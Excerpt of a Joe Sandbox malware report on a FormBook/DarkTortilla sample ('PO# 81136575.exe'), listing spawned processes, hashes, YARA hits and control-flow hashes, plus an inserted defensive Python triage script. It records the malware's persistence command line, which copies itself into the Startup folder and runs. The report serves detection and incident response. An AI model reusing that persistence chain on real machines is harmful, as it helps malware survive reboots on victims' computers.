• Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1253880543.000000000467B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1251917102.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1253880543.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1253880543.00000000047DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1256723069.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 4
Start time: 12:54:07
Start date: 28/11/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "cmd" /c ping 127.0.0.1 -n 49 > nul && copy "C:\Users\user\Desktop\PO# 81136575.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe" && ping 127.0.0.1 -n 49 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe"
Imagebase: 0x4f0000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 5
Start time: 12:54:07
Start date: 28/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7d0360000
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 6
Start time: 12:54:07
Start date: 28/11/2024
Path: C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit): true
Commandline: ping 127.0.0.1 -n 49
Imagebase: 0xbc0000
File size: 18'944 bytes
MD5 hash: B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 12:54:52
Start date: 28/11/2024
Path: C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit): true
Commandline: ping 127.0.0.1 -n 49
Imagebase: 0xbc0000
File size: 18'944 bytes
MD5 hash: B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 14
Start time: 12:55:05
Start date: 28/11/2024
Path: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe"
Imagebase: 0x720000
File size: 1'565'184 bytes
MD5 hash: B353674E16431A7424571790D4D58F71
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000E.00000002.5995803549.0000000004140000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000E.00000002.5995803549.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.6031342259.000000000FC40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.6031342259.000000000FC40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000E.00000002.5966810448.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 74%, ReversingLabs
Reputation: low
Has exited: false

                                                                                                                                              Target ID:17
                                                                                                                                              Start time:12:55:37
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe"
                                                                                                                                              Imagebase:0x720000
                                                                                                                                              File size:1'565'184 bytes
                                                                                                                                              MD5 hash:B353674E16431A7424571790D4D58F71
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000011.00000002.5979216794.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:18
                                                                                                                                              Start time:12:55:41
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                                                              Imagebase:0xa80000
                                                                                                                                              File size:43'008 bytes
                                                                                                                                              MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2734341431.0000000001930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.2734341431.0000000001930000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2731267987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.2731267987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              Reputation:moderate
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:20
                                                                                                                                              Start time:12:56:13
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                              Wow64 process (32bit):
                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                                                              Imagebase:
                                                                                                                                              File size:43'008 bytes
                                                                                                                                              MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:21
                                                                                                                                              Start time:12:56:16
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\sages.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\sages.exe"
                                                                                                                                              Imagebase:0xed0000
                                                                                                                                              File size:78'336 bytes
                                                                                                                                              MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Antivirus matches:
                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                              • Detection: 83%, ReversingLabs
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:22
                                                                                                                                              Start time:12:56:16
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\sages.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\sages.exe"
                                                                                                                                              Imagebase:0x350000
                                                                                                                                              File size:78'336 bytes
                                                                                                                                              MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:23
                                                                                                                                              Start time:12:56:28
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                                                                                              Imagebase:0x140000000
                                                                                                                                              File size:16'696'840 bytes
                                                                                                                                              MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:24
                                                                                                                                              Start time:12:56:29
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\clip.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Windows\SysWOW64\clip.exe"
                                                                                                                                              Imagebase:0x500000
                                                                                                                                              File size:24'576 bytes
                                                                                                                                              MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000018.00000002.5955097403.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000018.00000002.5955097403.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000018.00000002.5957899892.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000018.00000002.5957899892.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000018.00000002.5957820613.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000018.00000002.5957820613.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              Has exited:false
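The records above show the pattern a responder has to pull out of this listing by hand: the submitted sample re-appears byte-for-byte as sage.exe in the per-user Startup folder (same MD5 as the header), while FormBook is detected only in the memory of AddInProcess32.exe and clip.exe, two Microsoft binaries whose on-disk hashes are the legitimate files. The script below is an added example, not part of the Joe Sandbox report and not Joe Security code. It parses the "Target ID:" records in the same key:value layout the report uses, with a constructed, trimmed copy of records 17, 18, 23 and 24 embedded as sample input, and turns them into three findings (Startup-folder persistence, a dropped self-copy, FormBook inside an injection host) plus a file-hash IOC set. The INJECTION_HOSTS list is an assumption taken from what this report shows; on another sample FormBook picks a different host, so the check is on "OS binary with an in-memory FormBook hit", not on those two names.

```python
import re
from dataclasses import dataclass, field

# From the report header (submitted sample "PO# 81136575.exe").
SUBMITTED_MD5 = "b353674e16431a7424571790d4d58f71"

# Constructed sample input: four records copied from this report, trimmed to
# the fields the triage below uses. Real reports carry more fields per record.
SAMPLE_LISTING = r"""
Target ID:17
Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe"
MD5 hash:B353674E16431A7424571790D4D58F71
Yara matches:
• Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000011.00000002.5979216794.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:false

Target ID:18
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2734341431.0000000001930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:23
Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
Has exited:false

Target ID:24
Path:C:\Windows\SysWOW64\clip.exe
Commandline:"C:\Windows\SysWOW64\clip.exe"
MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000018.00000002.5955097403.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000018.00000002.5955097403.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Has exited:false
"""

STARTUP_FOLDER = "\\start menu\\programs\\startup\\"
FORMBOOK_RULES = {"JoeSecurity_FormBook_1", "Windows_Trojan_Formbook_1112e116"}
# Assumption drawn from this report: Microsoft binaries FormBook was found living
# inside. Their on-disk hashes are the legitimate files, so the hit is memory-only.
INJECTION_HOSTS = {"addinprocess32.exe", "clip.exe"}


@dataclass
class Process:
    target_id: int
    path: str = ""
    commandline: str = ""
    md5: str = ""
    yara_rules: list = field(default_factory=list)
    has_exited: bool = False

    @property
    def image_name(self) -> str:
        return self.path.rsplit("\\", 1)[-1].lower()


def parse_listing(text: str) -> list:
    """Parse 'Target ID:' records written in the report's key:value layout."""
    procs = []
    cur = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Target ID:"):
            cur = Process(target_id=int(line.split(":", 1)[1]))
            procs.append(cur)
            continue
        if cur is None:
            continue
        if line.startswith("•"):  # one YARA match per bullet; keep the rule name
            m = re.search(r"Rule:\s*([^,]+)", line)
            if m:
                cur.yara_rules.append(m.group(1).strip())
            continue
        key, _, val = line.partition(":")
        key, val = key.strip(), val.strip()
        if key == "Path":
            cur.path = val
        elif key == "Commandline":
            cur.commandline = val
        elif key == "MD5 hash":
            cur.md5 = val.lower()
        elif key == "Has exited":
            cur.has_exited = (val == "true")
    return procs


def triage(procs: list, submitted_md5: str) -> list:
    """Return (target_id, finding) pairs a responder would act on."""
    findings = []
    for p in procs:
        if STARTUP_FOLDER in p.path.lower():
            findings.append((p.target_id, "persistence:startup_folder"))
        if p.md5 == submitted_md5.lower():
            findings.append((p.target_id, "self_copy:md5_matches_submitted_sample"))
        if p.image_name in INJECTION_HOSTS and FORMBOOK_RULES & set(p.yara_rules):
            findings.append((p.target_id, f"injection:formbook_in_{p.image_name}"))
    return findings


def file_iocs(procs: list) -> set:
    """MD5s worth blocking: files with YARA hits, minus the injection hosts,
    whose hashes are clean Microsoft binaries and would only cause false positives."""
    return {p.md5 for p in procs if p.yara_rules and p.image_name not in INJECTION_HOSTS}


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE_LISTING)
    for tid, finding in triage(parsed, SUBMITTED_MD5):
        print(f"target {tid}: {finding}")
    print("file IOCs:", sorted(file_iocs(parsed)))
```

The point of file_iocs is the caveat: clip.exe and AddInProcess32.exe carry FormBook in memory but their hashes (E40CB198... and 9827FF3C...) are the genuine Windows and .NET files, so the on-disk IOC from this report is the sample hash itself (identical for the Startup-folder copy), while the hosts are better expressed as a behavioural rule such as "AddInProcess32.exe started with no arguments" or "clip.exe with a FormBook memory signature".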

                                                                                                                                              Target ID:25
                                                                                                                                              Start time:12:56:45
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                              Wow64 process (32bit):
                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                                                              Imagebase:
                                                                                                                                              File size:43'008 bytes
                                                                                                                                              MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                              Has elevated privileges:
                                                                                                                                              Has administrator privileges:
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:26
                                                                                                                                              Start time:12:56:48
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\sages.exe
                                                                                                                                              Wow64 process (32bit):
                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\sages.exe"
                                                                                                                                              Imagebase:
                                                                                                                                              File size:78'336 bytes
                                                                                                                                              MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                                                                                                                              Has elevated privileges:
                                                                                                                                              Has administrator privileges:
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:27
                                                                                                                                              Start time:12:56:48
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\sages.exe
                                                                                                                                              Wow64 process (32bit):
                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\sages.exe"
                                                                                                                                              Imagebase:
                                                                                                                                              File size:78'336 bytes
                                                                                                                                              MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                                                                                                                              Has elevated privileges:
                                                                                                                                              Has administrator privileges:
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:28
                                                                                                                                              Start time:12:56:54
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                              Wow64 process (32bit):
                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                              Imagebase:
                                                                                                                                              File size:597'432 bytes
                                                                                                                                              MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                                              Has elevated privileges:
                                                                                                                                              Has administrator privileges:
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:false

Target ID: 29
Start time: 12:57:00
Start date: 28/11/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:
File size: 43'008 bytes
MD5 hash: 9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 30
Start time: 12:57:32
Start date: 28/11/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):
Commandline:
Imagebase:
File size: 43'008 bytes
MD5 hash: 9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false


Execution Graph

Execution Coverage: 32.4%
Dynamic/Decrypted Code Coverage: 30.8%
Signature Coverage: 26.9%
Total number of Nodes: 26
Total number of Limit Nodes: 2

Control-flow Graph

Memory Dump Source
• Source File: 00000000.00000002.1259751991.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
• Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_77b0000_PO# 81136575.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 479f5df8a401a8589a64b6112f0feff97430fedf85ac5612184edf19523f0257
• Instruction ID: 420c7141a29000ebe440dcf50e957ecf196f9005cafa65b61d80b4023b2f4938
• Opcode Fuzzy Hash: 479f5df8a401a8589a64b6112f0feff97430fedf85ac5612184edf19523f0257
• Instruction Fuzzy Hash: 07B30670E11228CFCB58EF78D989AACBBB2FB89300F4085E9D449A7350DB345E958F55

Control-flow Graph

Memory Dump Source
• Source File: 00000000.00000002.1259751991.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
• Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_77b0000_PO# 81136575.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1fe9c00ec437679dbb42ee11be80895cdb0b92cb2bcc227136cbda0b2942e6d2
• Instruction ID: 5804b42ace1f6ecb98384f83b53c65fbfe81ba5854eac4741f7565b5fc119929
• Opcode Fuzzy Hash: 1fe9c00ec437679dbb42ee11be80895cdb0b92cb2bcc227136cbda0b2942e6d2
• Instruction Fuzzy Hash: 47B30770E11228CFCB58EF78D989AACBBB2FB89300F4085E9D449A7350DB345E958F55

Control-flow Graph

Memory Dump Source
• Source File: 00000000.00000002.1258932762.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
• Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_72e0000_PO# 81136575.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 69ea42a64d04e748d8aaabed1e985564db0a89a0d0a5116208b550aa565785ad
• Instruction ID: 4102d9f643ee5f2ec46aebe8558c43d8a4f0695b2311c177de76f9f489bbf573
• Opcode Fuzzy Hash: 69ea42a64d04e748d8aaabed1e985564db0a89a0d0a5116208b550aa565785ad
• Instruction Fuzzy Hash: CFB3F770A11219CFCB18EF79E98966CBBF2FB89200F4085E9D488A7350DF345E958F95

Control-flow Graph

Memory Dump Source
• Source File: 00000000.00000002.1258932762.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
• Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_72e0000_PO# 81136575.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4b8a1ea55273f7cf12e97da9045185bc36acb9fc8a004a8c64a73eb351de2f46
• Instruction ID: 19de7b61e043d5ffa49d13284509fa827135f4bd9e1e36b7b7c9da98eb8d3fbc
• Opcode Fuzzy Hash: 4b8a1ea55273f7cf12e97da9045185bc36acb9fc8a004a8c64a73eb351de2f46
• Instruction Fuzzy Hash: 8CB3F770A11219CFCB18EF79E98966CBBF2FB89200F4085E9D488A7350DF345E958F95

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000000.00000002.1259751991.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
• Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_77b0000_PO# 81136575.jbxd
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: f95ed7d2e75a31e255580f39d5207ce34ab4edb516f9cf0bc2a1030b79889a45
• Instruction ID: 92184db4ba2829675407fa488bf473f55e84143e787958becc18a6387627e7b2
• Opcode Fuzzy Hash: f95ed7d2e75a31e255580f39d5207ce34ab4edb516f9cf0bc2a1030b79889a45
• Instruction Fuzzy Hash: 2082B370E15216CFCB24ABB8D98976E7BB2EF89300F8085E9D849E7350DA3C5D45CB91

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000000.00000002.1259751991.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
• Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_77b0000_PO# 81136575.jbxd
Similarity
• API ID:
• String ID: ]
• API String ID: 0-3352871620
• Opcode ID: 3cd535792e7ded3788ef05be78b010a5bb15448c2e929954f13dfc65a72f417e
• Instruction ID: adb16c4c1f4b09d8ca5ef19e86ee3d43465cf590dfaba519d3d4fcc5b258b02e
• Opcode Fuzzy Hash: 3cd535792e7ded3788ef05be78b010a5bb15448c2e929954f13dfc65a72f417e
• Instruction Fuzzy Hash: 3F028274B00219CFDB25DF68D854BAEBBB2BF89351F1480A9E9099B355CB34DC41CBA1
Memory Dump Source
• Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
• Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cc95525d463ecf5890b83b424a15d5937009a03e7530afb8771e60f7f0653f2b
• Instruction ID: ead94d40d369fb40d8f503eeb3453bd7f8ce828edc3f390076e452578e2f6ba3
• Opcode Fuzzy Hash: cc95525d463ecf5890b83b424a15d5937009a03e7530afb8771e60f7f0653f2b
• Instruction Fuzzy Hash: 68A27F74A002199FCB14DF69C884AAEBBB6FF8D300F198569E415EB365DB34DD42CB90

Control-flow Graph

Memory Dump Source
• Source File: 00000000.00000002.1259751991.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
• Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_77b0000_PO# 81136575.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 889acbb0f0c6b3e2894734886d8d37af94c93d478b7abda1d166b6f3dcd0e9c2
• Instruction ID: 7b5e94471a9f45cd421363a8b8f12731f47664b656cd2f012f11ce5faaa2b3d2
• Opcode Fuzzy Hash: 889acbb0f0c6b3e2894734886d8d37af94c93d478b7abda1d166b6f3dcd0e9c2
                                                                                                                                                • Instruction Fuzzy Hash: 9B727470E11215CBCB28EBB8D98976EBBB2EB89300F8085A9D849F7350DE3C5D45CB55
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 32328dec6f40105ba06c6f7b468e0b81b1da36fb3f65ca5ff3321d76206c6893
                                                                                                                                                • Instruction ID: 286dfd666d5eaa01d544aa14a03124b3c075ac2bd15a803b7a97eae91d450086
                                                                                                                                                • Opcode Fuzzy Hash: 32328dec6f40105ba06c6f7b468e0b81b1da36fb3f65ca5ff3321d76206c6893
                                                                                                                                                • Instruction Fuzzy Hash: 4FF1B274E00218DFDB68DFA9C984B9DBBB2BF89300F1481A9D549AB354EB349D85CF50
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 9cc01cb2c5e2b7e668f1d62d8a543cf02051149c22470aa4f8f3c4787c68aea9
                                                                                                                                                • Instruction ID: c0f35a65655c4cb0ca4953964941279106c52eeaf75a6cba3323f9b448d2a5fe
                                                                                                                                                • Opcode Fuzzy Hash: 9cc01cb2c5e2b7e668f1d62d8a543cf02051149c22470aa4f8f3c4787c68aea9
                                                                                                                                                • Instruction Fuzzy Hash: EEB18470704215EFFF289A36948473EB6F7AFCF751F598429D88686288CF34C8858752

                                                                                                                                                Control-flow Graph (rendered graph not reproduced): entry block 313cd30-313cd61; calls 313afe0, 313aff0, 313b000, 313b010, 313afc0, 313b020, 313b030, 313b040, 313b050, 313b060, 313b070
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: h3o
                                                                                                                                                • API String ID: 0-2140973757
                                                                                                                                                • Opcode ID: 8f459490219481401965f53800038716b171137d06a34546f722d22f921b4069
                                                                                                                                                • Instruction ID: 6e0fe3a875170bccf32cf1c330b3128149b1d9f682d36a3666668cee3e31453e
                                                                                                                                                • Opcode Fuzzy Hash: 8f459490219481401965f53800038716b171137d06a34546f722d22f921b4069
                                                                                                                                                • Instruction Fuzzy Hash: 49A24B74E15219CFCB18EFB8E9887ADBBB1FB88300F5085E9D449A3254DA385D85CF61

                                                                                                                                                Control-flow Graph (rendered graph not reproduced): entry block 313ccff-313cd0c; calls 313afe0, 313aff0, 313b000, 313b010, 313afc0, 313b020, 313b030, 313b040, 313b050, 313b060, 313b070
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
